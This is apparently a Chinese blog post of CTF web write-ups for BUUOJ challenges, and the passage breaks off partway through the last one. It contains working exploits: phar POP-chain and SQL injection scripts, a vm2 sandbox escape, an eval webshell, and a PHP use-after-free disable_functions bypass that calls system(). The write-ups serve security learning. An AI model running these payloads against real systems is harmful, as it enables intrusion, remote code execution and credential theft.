web 刷题(四)

阅读数: 次 2020-12-14

[SWPUCTF 2018]SimplePHP

2020.12.14

考点

Pop 链 phar 反序列化

phar 文件对后缀名不做要求

做题步骤

一个文件上传网页。

上传文件后得不到对应的文件路径。

且查看文件没有文件显示，但是我们看到url file.php?file= 尝试伪协议读文件。

file.php?file=php://filter/read=convert.base64-encode/resource=file.php 发现并不能读取到文件内容

我们尝试直接 file=file.php

成功显示内容

于是一次读取里面的其他的 php 文件。

index.php

<?php 
header("content-type:text/html;charset=utf-8");  
include 'base.php';
?>

file.php

<?php
header("content-type:text/html;charset=utf-8"); 
include 'function.php'; 
include 'class.php'; 
ini_set('open_basedir','/var/www/html/'); 
$file = $_GET["file"] ? $_GET['file'] : ""; 
if(empty($file)) { 
  echo "<h2>There is no file to show!<h2/>"; 
} 
$show = new Show(); 
if(file_exists($file)) { 
  $show->source = $file; 
  $show->_show(); 
} else if (!empty($file)){ 
  die('file doesn\'t exists.'); 
} 
?>

Function.php

<?php 
//show_source(__FILE__); 
include "base.php"; 
header("Content-type: text/html;charset=utf-8"); 
error_reporting(0); 
function upload_file_do() { 
    global $_FILES; 
    $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; 
    //mkdir("upload",0777); 
    if(file_exists("upload/" . $filename)) { 
        unlink($filename); 
    } 
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename); 
    echo '<script type="text/javascript">alert("上传成功!");</script>'; 
} 
function upload_file() { 
    global $_FILES; 
    if(upload_file_check()) { 
        upload_file_do(); 
    } 
} 
function upload_file_check() { 
    global $_FILES; 
    $allowed_types = array("gif","jpeg","jpg","png"); 
    $temp = explode(".",$_FILES["file"]["name"]); 
    $extension = end($temp); 
    if(empty($extension)) { 
        //echo "<h4>请选择上传的文件:" . "<h4/>"; 
    } 
    else{ 
        if(in_array($extension,$allowed_types)) { 
            return true; 
        } 
        else { 
            echo '<script type="text/javascript">alert("Invalid file!");</script>'; 
            return false; 
        } 
    } 
} 
?>

Class.php

<?php
class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?>

Base.php

<?php 
    session_start(); 
?> 
<!DOCTYPE html> 
<html> 
<head> 
    <meta charset="utf-8"> 
    <title>web3</title> 
    <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/css/bootstrap.min.css"> 
    <script src="https://cdn.staticfile.org/jquery/2.1.1/jquery.min.js"></script> 
    <script src="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script> 
</head> 
<body> 
    <nav class="navbar navbar-default" role="navigation"> 
        <div class="container-fluid"> 
        <div class="navbar-header"> 
            <a class="navbar-brand" href="index.php">首页</a> 
        </div> 
            <ul class="nav navbar-nav navbra-toggle"> 
                <li class="active"><a href="file.php?file=">查看文件</a></li> 
                <li><a href="upload_file.php">上传文件</a></li> 
            </ul> 
            <ul class="nav navbar-nav navbar-right"> 
                <li><a href="index.php"><span class="glyphicon glyphicon-user"></span><?php echo $_SERVER['REMOTE_ADDR'];?></a></li> 
            </ul> 
        </div> 
    </nav> 
</body> 
</html> 
<!--flag is in f1ag.php-->

upload_file.php

<?php 
include 'function.php'; 
upload_file(); 
?> 
<html> 
<head> 
<meta charest="utf-8"> 
<title>文件上传</title> 
</head> 
<body> 
<div align = "center"> 
        <h1>前端写得很low,请各位师傅见谅!</h1> 
</div> 
<style> 
    p{ margin:0 auto} 
</style> 
<div> 
<form action="upload_file.php" method="post" enctype="multipart/form-data"> 
    <label for="file">文件名:</label> 
    <input type="file" name="file" id="file"><br> 
    <input type="submit" name="submit" value="提交"> 
</div> 

</script> 
</body> 
</html>

不能访问 f1ag.php

进行代码审计

上传文件只能为 "gif","jpeg","jpg","png" 后缀白名单
上传后的文件名，md5(filename+yourip)+jpg ，然后保存到 upload 文件夹
查看文件那利用 class.php 里面的 Show 类 来显示利用 file_exists判断我们的文件名所以利用 base64 不能得到。调用的是 Show 类的 _show() 方法

查看 class.php 的类和他的方法。

发现利用 Show类的方法来得到 f1ag.php 的能容是不能实现的。 因为 _show() 函数会检测。

发现里面还有 C1e4r类 Test类

气质 C1e4r类的魔术方法有一个打印功能

<?php
class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

_destruct 的时候会输出 $this->test $this->test = $this->str;

在 Show 类中

public function __toString()
{
   $content = $this->str['str']->source;
   return $content;
}

利用 C1e4r 类的 ehco 方法调用 Show 类的 __toString() 魔术方法

然后看到 Test 类里面有个 __get() 方法。且最后会利用 file_get 函数得到一个文件内容的 base64。

__get() 当未定义的属性或没有权限访问的属性被访问时该方法被调用。

所以我们让 Show 类的 str[‘str’] = new Test();

然后布置 Test 的 params[‘source’] = flag 的路径

这样我们的 pop链就构造好了。

<?php
class C1e4r
{
    public $test;
    public $str;
}
 
class Show
{
    public $source;
    public $str;
}
class Test
{
    public $file;
    public $params;
 
}
 
$c1e4r = new C1e4r();
$show = new Show();
$test = new Test();
$test->params['source'] = "/var/www/html/f1ag.php";
$c1e4r->str = $show;  
$show->str['str'] = $test; 
 
 
$phar = new Phar("exp.phar"); 
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >'); 
$phar->setMetadata($c1e4r); 
$phar->addFromString("exp.txt", "test"); 
$phar->stopBuffering();
 
?>

设置 php.ini 的 phar.readonly = Off

然后访问我们的这个php 文件，这样会在我们的当前目录下生成 exp.phar

(因为 phar 对文件后缀无要求。我们可以修改 exp.phar 为 exp.jpg 从而实现上传) 然后利用 phar:// 伪协议访问。

在网站 /upload 下找到我们上传的文件的名字。

然后访问

解密base64 得到 flag

[RoarCTF 2019]Online Proxy

2020.12.15

考点

sql 盲注 (xff)

做题步骤

打开网页

猜测有 ssrf

抓包

根据注释里面的当前ip

我们尝试利用 xff 修改ip

发现如果我们修改。上面出现了我们的修改后的 ip

而且出现了一个last ip保存的是我们上一次的ip。

所以猜测。我们的ip 会被保存在数据库中。然后会根据 ip 的当前值和之前是否一样从而取出来 ip。

尝试发现 xff 存在 sql注入单引号，可以利用sql 盲注得到 flag

exp 参考

https://www.codenong.com/cs106021454/

因为 flag 不在当前数据库中。

所以要利用

0' or ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>1 or '0 先得到我们需要的数据库地址

然后利用这个数据库去进行爆破利用 F4l9_D4t4B45e

import requests
url = "http://node3.buuoj.cn:25174/"

head ={
    "X-Forwarded-For":"",
    "Cookie" : "track_uuid=ca82c94f-a15b-4270-8947-404b385c02a4"
}
# #查库名
# payload = "0' or ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{},1))>{} or '0"

# #查表名
# payload = "0' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='F4l9_D4t4B45e')),{},1))>{} or '0"

# #查列名
# payload = "0' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F4l9_t4b1e')),{},1))>{} or '0"

#查flag
payload = "0' or ascii(substr((select(group_concat(F4l9_C01uMn))from(F4l9_D4t4B45e.F4l9_t4b1e)),{},1))>{} or '0"

flag =""

for i in range(1,1000):
    low = 32
    high =137
    mid = (low+high)//2

    while(low < high):
        print(i,mid)
        payload1 = payload.format(i,mid)
        head["X-Forwarded-For"] = payload1
        print(head["X-Forwarded-For"])
        r = requests.get(url,headers=head)
        head["X-Forwarded-For"]= "penson"
        r = requests.get(url,headers=head)
        r = requests.get(url,headers=head)

        if "Last Ip: 1 " in r.text:
            low = mid+1
        else:
            high = mid

        mid =(low+high)//2


    if(mid ==32 or mid ==127):
        break
    flag +=chr(mid)
    print(flag)

print(flag)

[HarekazeCTF2019]encode_and_encode

2020.12.15

考点

json 数据。

json 在传输时是 Unicode 编码的

做题步骤

可以查看到源代码

<?php
error_reporting(0);

if (isset($_GET['source'])) {
  show_source(__FILE__);
  exit();
}

function is_valid($str) {
  $banword = [
    // no path traversal
    '\.\.',
    // no stream wrapper
    '(php|file|glob|data|tp|zip|zlib|phar):',
    // no data exfiltration
    'flag'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}

$body = file_get_contents('php://input');
$json = json_decode($body, true);

if (is_valid($body) && isset($json) && isset($json['page'])) {
  $page = $json['page'];
  $content = file_get_contents($page);
  if (!$content || !is_valid($content)) {
    $content = "<p>not found</p>\n";
  }
} else {
  $content = '<p>invalid request</p>';
}

// no data exfiltration!!!
$content = preg_replace('/HarekazeCTF\{.+\}/i', 'HarekazeCTF{&lt;censored&gt;}', $content);
echo json_encode(['content' => $content]);

首先 php://inpit 得到 post 的参数。

参数为 json格式

调用 is_valid() 过滤字符串且不能有 flag 字符。

获得他的 page 属性。然后利用 file_get_contents 得到文件内容（可以使用伪协议 php://filter

将文件中 HarekazeCTF{} 替换为 HarekazeCTF{<censored>} ，这样就无法明文读取 flag

{ "page" : "\u0070\u0068\u0070://filter/convert.base64-encode/resource=/\u0066\u006c\u0061\u0067"}

然后解密得到 flag。

[BJDCTF2020]EzPHP

2020.12.15 2020.12.16

考点

绕过，伪协议读数据

做题步骤

注释里面发现

访问页面

得到源码 1nD3x.php

<?php
highlight_file(__FILE__);
error_reporting(0); 

$file = "1nD3x.php";
$shana = $_GET['shana'];
$passwd = $_GET['passwd'];
$arg = '';
$code = '';

echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";

if($_SERVER) { 
    if (
        preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
        )  
        die('You seem to want to do something bad?'); 
}

if (!preg_match('/http|https/i', $_GET['file'])) {
    if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { 
        $file = $_GET["file"]; 
        echo "Neeeeee! Good Job!<br>";
    } 
} else die('fxck you! What do you want to do ?!');

if($_REQUEST) { 
    foreach($_REQUEST as $value) { 
        if(preg_match('/[a-zA-Z]/i', $value))  
            die('fxck you! I hate English!'); 
    } 
} 

if (file_get_contents($file) !== 'debu_debu_aqua')
    die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");


if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
    extract($_GET["flag"]);
    echo "Very good! you know my password. But what is flag?<br>";
} else{
    die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

if(preg_match('/^[a-z0-9]*$/isD', $code) || 
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { 
    die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="); 
} else { 
    include "flag.php";
    $code('', $arg); 
} ?>
This is a very simple challenge and if you solve it I will give you a flag. Good Luck!
fxck you! I hate English!

一共 6个大比较。

第一个

第二个

第三个

第四个

第五个

第六个

绕过

$_SERVER

$_SERVER[‘QUERY_STRING’] 之前有一道题有过经验，该方法不会自动解码url编码后的文字

得到的是 url 后面的值

ip/?a=xxx&b=xxx => $_SERVER 得到 a=xxx&b=xxx

但是这里我们不能有正则匹配的字符串

绕过这个点。我们需要利用 url 编码实现绕过
绕过 preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute'

这里的绕过点，传入的 debu 以 aqua_is_cute 开始又以 aqua_is_cute 结尾，但是 debu 的值不能为 aqua_is_cute

绕过只需要在 debu=aqua_is_cute%0a
$_REQUEST 同时接受GET和POST的数据，并且POST具有更高的优先值。

我们所以这里会判断我们上面需要传入的 debu 和 file 的值进行比较，所以在get 传入这两值的同时我们还需要 post 传入这两个值。

这样这里的 $_REQUEST 对应的 $valu的值就是 post 传入的。这里传入除了 a-z A-Z 的字符就好

POST: debu=1&file=1

因为 $cookie 的也会被传入，所以我们在传值的时候需要删除 cookie 这样我们才能正常运行

感谢 y1ng师傅
file_get_contents($file) !== 'debu_debu_aqua' 绕过这个比较直接利用伪协议

data 伪协议

?file=data://text/plain,debu_debu_aqua
sha1($shana) === sha1($passwd) && $shana != $passwd

这里的绕过，直接 传数组就能实现

shana[]=1&passwd[]=2

然后利用 extract($_GET["flag"]);
extract() 函数从数组中将变量导入到当前的符号表。

利用这个函数来控制后面的$code $arg

正则比较中， $code 只能为 a-z 0-9 的字符

查看了 wp 才知道要利用 create_function 来执行命令

$code和$arg可控，利用$code('',$arg)进行create_function注入
1
2
3
function a('',$arg){
return $arg
}
$arg=}代码;//,则}闭合了a()，同时//注释了后面的内容
1
2
3
function a('',$arg){
return }代码;//
}
利用的格式
1
2
设flag[code]=create_function
传入flag[arg]=}这里加入执行代码;//
因为有过滤的值

所以 flag[arg] 的值不能 urlcode 绕过，因为验证的时候过滤了 arg

因为过滤了很多字符串我们我们可以取反利用不可显示字符绕过，然后利用 urlcode 编码后传入。

测试想办法实现读取 flag.php 文件里面的未知数

利用函数 get_defined_vars()

/1nD3x.php?file=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&&%66%6c%61%67[%63%6f%64%65]=create_function&%66%6c%61%67[%61%72%67]=};var_dump(get_defined_vars());//

发现提示，rea1fl4g.php

尝试利用 php 伪协议读因为不能使用 include

然后可以利用 require 来得到

<?php
$s = 'php://filter/convert.base64-encode/resource=rea1fl4g.php';
echo urlencode(~$s);
#%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F
?>

利用

1
2
3

require(~(%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F));//
偷换
var_dump(get_defined_vars());//

base64 解密

[NCTF2019]SQLi

2020.12.16

考点

Sql 注入利用 ;%00 代替（注释符，闭合单引号

利用 regexp 利用正则查找。

https://p3rh4ps.top/index.php/2019/12/31/19-12-31-nctf2019-sqli-regexp%E6%B3%A8%E5%85%A5/

做题步骤

打开网页

给了语句提示

sqlquery : select * from users where username='' and passwd=''

输入 admin admin 报错。

or 也报错

利用 bp 进行爆破

设置字典

根据返回包的内容长度确定过滤的字符长度为 201 的就是被过滤的

但是发现我不会了。

扫描下目录

发现有个 robot.txt

访问

看到一个 hint.txt

访问看看

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

提示我们输入的 passwd === admin 的password 就好

跟着wp 学到一个新知识点

发现 \ 没有被过滤且我们知道 sql 语句，

sqlquery : select * from users where username='' and passwd=''

所以这里我们可以利用 username = \ 从而实现单引号逃逸

然后在passwd里用正则匹配字符按位爆破

利用 regexp '^开头字符' 单个字符单个字符添加

测试如下

从而构造 payload 为

select * from users where username='\' and passwd='||/**/passwd/**/regexp/**/"^str";%00';

因为 ;%00 相当于将前面的语句闭合了。

因为过滤了很多字符串这里我们将字符串转为 hex 传入。

import string
import requests
import time
url='http://53f5c8ce-20de-4240-9989-07a10fcfec8b.node3.buuoj.cn/'


passwd = ''
string= string.ascii_lowercase + string.digits + '_'

for n in range(100):
    for m in string:
        data = {
            "username":"\\",
            "passwd":"||/**/passwd/**/regexp/**/\"^{}\";\x00".format((passwd+m))
        }
        res = requests.post(url,data=data)
        time.sleep(0.1)
        # print(res.status_code)
        if res.status_code != 200:
            passwd += m
            print(passwd)
            break
    if m=='_' and 'welcome' not in res.text:
        break
print(passwd)

得到密码

因为我们过滤了 admin 我们用户名可以输入除了黑名单里面的任意字符

登录得到 flag

[网鼎杯 2020 白虎组]PicDown

2020.12.17

考点

目录穿透

Python 反弹shell

做题步骤

打开网页输入点东西后

发现有个 url。

测试发现没什么东西。

测试 ../../

感觉没有什么过滤

测试看看能不能访问 /etc/passwd

发现下载了文件猜测可以目录穿透。

看看根目录下有没有 flag ../../../../flag

发现能够直接得到 flag

感觉应该没这么简单

看了下 wp 说应该是需要利用得到 app.py 文件代码审计那 shell的

先查看文件进程

../../../../proc/self/cmdline文件查看当前进行进程执行命令

有个 app.py

去看看这个文件有什么东西。

能够得到源码

from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

然后发现有一个路由

@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res

这里可以直接执行命令

但是我们需要得到 key

这个key 的文件为 "/tmp/secret.txt"

且发现这个 key 打开了但是没有关闭，所以我们可以得到他的文件符。

/proc/pid/cmdline  包含了用于开始进程的命令  ；
/proc/pid/cwd 包含了当前进程工作目录的一个链接  ；
/proc/pid/environ  包含了可用进程环境变量的列表  ；
/proc/pid/exe  包含了正在进程中运行的程序链接；
/proc/pid/fd/  这个目录包含了进程打开的每一个文件的链接；
/proc/pid/mem  包含了进程在内存中的内容；
/proc/pid/stat 包含了进程的状态信息；
/proc/pid/statm  包含了进程的内存使用信息。

但是我们不知道对应的进程数字是多少

爆破看看

发现为3的时候

有个 base64 加密

w1OySiR0kGmekq98twu0CvfLKTB/e72z7ryP1F3SOms=

利用 python 反弹shell

得到 flag

[WUSTCTF2020]CV Maker

2020.12.17

考点

文件上传

做题步骤

直接上传文件

蚁剑链接得到 flag

[HFCTF2020]JustEscape

2020.12.17

考点

vm2 逃逸

https://github.com/patriksimek/vm2/issues/225

过滤绕过

做题步骤

根据网页猜测可以代码执行

访问 run.php

测试 system

发现不行

看了 wp 发现是 nodejs + vm2

https://blog.csdn.net/SopRomeo/article/details/108629520

https://ha1c9on.top/2020/04/20/hfctf2020-web/#HFCTF2020JustEscape

https://www.zhaoj.in/read-6512.html

首先利用各种语言的爆破异常来获得信息

/run.php?code=Error().stack;

从而知道是 vm2 + nodejs

找到一个逃逸的

https://github.com/patriksimek/vm2/issues/225

"use strict";
const {VM} = require('vm2');
const untrusted = '(' + function(){
	TypeError.prototype.get_process = f=>f.constructor("return process")();
	try{
		Object.preventExtensions(Buffer.from("")).a = 1;
	}catch(e){
		return e.get_process(()=>{}).mainModule.require("child_process").execSync("whoami").toString();
	}
}+')()';
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}

js绕过关键词过滤的方法:

拼接变量绕过

如过滤关键词prototype，则绕过方式为${`${`prototyp`}e`}

最后的 payload

?code=(function (){
    TypeError[`${`${`prototyp`}e`}`][`${`${`get_proces`}s`}`] = f=>f[`${`${`constructo`}r`}`](`${`${`return proces`}s`}`)();
    try{
        Object.preventExtensions(Buffer.from(``)).a = 1;
    }catch(e){
        return e[`${`${`get_proces`}s`}`](()=>{}).mainModule[`${`${`requir`}e`}`](`${`${`child_proces`}s`}`)[`${`${`exe`}cSync`}`](`cat /flag`).toString();
    }
})()

然后 cat /flag

[GYCTF2020]EasyThinking

2020.12.18

考点

Thinkphp v6.0

Disable_function

做题步骤

打开网页注册，登录，搜索，登出，搜索记录

让看到注释 Navigation

访问

获得版本提示。但是没有这个控制权

直接搜下这个版本漏洞

发现有个任意文件操作的漏洞

http://j0k3r.top/2020/03/02/ThinkPHP_v6.0.0_ArbitraryFileWriting/#2-%E5%A4%8D%E7%8E%B0

但是我们要知道是怎么调用的。

尝试目录扫描

发现有个 www.zip

下载下来代码审计

因为我们知道 thinkphp v6.0 的文件操作利用的是 session。

直接全局搜索

有个 session 初始化

然后search 有个 session 的利用

然后发现

有个 seesion set

这里我们可以利用这个漏洞上传

在登录时会根据我们的 phpsession 创建一个 sesssion 文件夹

我们在登录的时候修改 session 最后4位为 .php 这样保存的文件就为 php 后缀的php文件。

因为我们搜索的时候会把我们的搜索内容写进去，所以我们直接输入 <?php phpinfo(); ?>

访问对应保存 session 文件的地方

/runtime/session/sess_ + PHPSESSION

所以我们可以写入一句话。

<?php eval($_POST['jly']); ?>

使用蚁剑链接

发现有 disable_functions

发现

flag 文件没东西需要调用 readflag

但是有 disable_function

利用蚁剑绕过 disable_function 的插件

然后就能执行命令

也可以在 /tmp 目录上传。让 indclude 这个 php

<?php

pwn("/readflag"); //这里是想要执行的系统命令

function pwn($cmd) {
    global $abc, $helper;

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                # handle pie
                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                # 'constant' constant check
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                # 'bin2hex' constant check
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) { # ELF header
                return $addr;
            }
        }
    }

    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) { # system
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    class ryat {
        var $ryat;
        var $chtg;
        
        function __destruct()
        {
            $this->chtg = $this->ryat;
            $this->ryat = 1;
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; # increase this value if you get segfaults

    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_repeat('A', 79);

    $poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';
    $out = unserialize($poc);
    gc_collect_cycles();

    $v = [];
    $v[0] = ptr2str(0, 79);
    unset($v);
    $abc = $out[2][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }

    # leaks
    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    # fake value
    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    # fake reference
    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }

    # fake closure object
    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    # pwn
    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); # internal func type
    write($abc, 0xd0 + 0x68, $zif_system); # internal func handler

    ($helper->b)($cmd);

    exit();
}

上传

访问这个文件

得到 flag

[强网杯 2019]Upload

2020.12.19

考点

反序列化

文件泄露

代码审计

做题步骤

发现登录后，可以上传文件

上传一句话，发现不成功。

可以查看 upload 页面

没有思路。于是扫目录

发现有个备份文件

www.tar.gz

下载解压

继续在题目中寻找一些知识点。

查看网页的 cookie

发现有个 user

感觉是个 base64 解密看看

发现存在序列化内容。

从而我们可以猜测题目应该是存在序列化和反序列化的。

进行代码审计。

因为这个名字叫做 user 我们直接全局搜索

发现 application 里面的这几个php 比较关键

发现 Index.php 中

会进行反序列化。反序列的内容是cookie

在 Profile.php 中

上传图片会进行一个序列化保存

知道可能存在反序列化漏洞。然后继续审计代码。

且只要有 login_check 函数的地方就会对 usr 进行一次反序列

然后看完代码逻辑。发现函数

Profile.php中的 upload_img() 函数

查看代码逻辑。

public function upload_img(){
        if($this->checker){
            if(!$this->checker->login_check()){
                $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
                $this->redirect($curr_url,302);
                exit();
            }
        }

        if(!empty($_FILES)){
            $this->filename_tmp=$_FILES['upload_file']['tmp_name'];
            $this->filename=md5($_FILES['upload_file']['name']).".png";
            $this->ext_check();
        }
        if($this->ext) {
            if(getimagesize($this->filename_tmp)) {
                @copy($this->filename_tmp, $this->filename);
                @unlink($this->filename_tmp);
                $this->img="../upload/$this->upload_menu/$this->filename";
                $this->update_img();
            }else{
                $this->error('Forbidden type!', url('../index'));
            }
        }else{
            $this->error('Unknow file type!', url('../index'));
        }
    }

